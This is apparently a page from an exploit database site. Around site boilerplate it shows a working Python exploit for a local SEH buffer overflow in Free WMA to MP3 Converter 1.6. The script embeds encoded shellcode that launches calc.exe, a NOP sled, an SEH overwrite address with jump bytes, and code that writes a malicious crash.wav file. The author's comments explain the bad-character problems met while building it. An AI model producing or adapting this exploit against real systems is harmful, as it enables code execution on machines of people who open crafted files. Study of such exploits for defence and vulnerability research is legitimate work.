0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Free WMA to MP3 converter v1.6 - Local buffer overflow (SEH)
#!/usr/bin/python -w # In the name of allah # Title : Local buffer overflow - SEH # Infected program: [Free WMA to MP3 converter 1.6] # Date: 30/11/2012 # Exploit Author: [R3ZN0V] # Software : [www.eusing.com] # Download Link: [http://www.eusing.com/free_wma_converter/mp3_wma_converter.htm] # OS's: [Windows xp sp3 , Windows 7 64bit sp1 and 32bit] # References : http://www.1337day.com/exploit/17433 #=====================================================================================# # First , i'd like to thank b33f for all his cooperation (always the best man ;) ) . # # i suffered soo much until i made this a work exploit ,as well a few problems with # # badchars analyzing and executing my shellcode , which is inside the memory after # # tracing badchars , if you looked deeply at the path you'll see a weird thing # # is a two byte of 0D will be added automatically like this : # # 09 (0D) 0A 0B 0C (0D) , i've no idea what caused that,first 0D is the problem # # Probably like null-byte , however , go to metasploit and figure this out by badchars# # analyzing , and see try to replace shell to another one using this command : # # msfencode -b '\x00\x0a' , obviously it won't work . # #=====================================================================================# file = "crash.wav" # windows/exec CMD=calc.exe EXITFUNC=seh R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -t c <========= 227 byte iteration=1 =========> shell = ("\xda\xc6\xd9\x74\x24\xf4\x5f\xb8\xc2\x0f\x5e\x65\x33\xc9\xb1" "\x33\x31\x47\x17\x83\xc7\x04\x03\x85\x1c\xbc\x90\xf5\xcb\xc9" "\x5b\x05\x0c\xaa\xd2\xe0\x3d\xf8\x81\x61\x6f\xcc\xc2\x27\x9c" "\xa7\x87\xd3\x17\xc5\x0f\xd4\x90\x60\x76\xdb\x21\x45\xb6\xb7" "\xe2\xc7\x4a\xc5\x36\x28\x72\x06\x4b\x29\xb3\x7a\xa4\x7b\x6c" "\xf1\x17\x6c\x19\x47\xa4\x8d\xcd\xcc\x94\xf5\x68\x12\x60\x4c" "\x72\x42\xd9\xdb\x3c\x7a\x51\x83\x9c\x7b\xb6\xd7\xe1\x32\xb3" "\x2c\x91\xc5\x15\x7d\x5a\xf4\x59\xd2\x65\x39\x54\x2a\xa1\xfd" "\x87\x59\xd9\xfe\x3a\x5a\x1a\x7d\xe1\xef\xbf\x25\x62\x57\x64" "\xd4\xa7\x0e\xef\xda\x0c\x44\xb7\xfe\x93\x89\xc3\xfa\x18\x2c" "\x04\x8b\x5b\x0b\x80\xd0\x38\x32\x91\xbc\xef\x4b\xc1\x18\x4f" "\xee\x89\x8a\x84\x88\xd3\xc0\x5b\x18\x6e\xad\x5c\x22\x71\x9d" "\x34\x13\xfa\x72\x42\xac\x29\x37\xb2\x5d\xe0\xad\x23\xc4\x91" "\x8c\x29\xf7\x4f\xd2\x57\x74\x7a\xaa\xa3\x64\x0f\xaf\xe8\x22" "\xe3\xdd\x61\xc7\x03\x72\x81\xc2\x67\x15\x11\x8e\x49\xb0\x91" "\x35\x96") evil = "\x90" * 11 + shell # don't shrink these nops or the exploit wouldn't work , just in case if you replaced the shellcode junk1 = "\xEB\x06\x90\x90" # jmp 4 byte to far jmp junk2 = "\x56\x23\x40\x00" # pop pop retn Wmpcon.exe Rebase=false , aslr=false , seh=unsafe os=false junk3 = "\xE9\xEA\xEF\xFF\xFF" # jmp back 4108 byte to the beggining of our buffer junk4 = "C"*50 buffer = evil + "\x41"*(4116-len(evil)) + junk1 + junk2 + junk3 + junk4 text = open(file, "w") text.write(buffer) text.close() print "\t\n The file has been created :) " # 0day.today [2024-11-15] #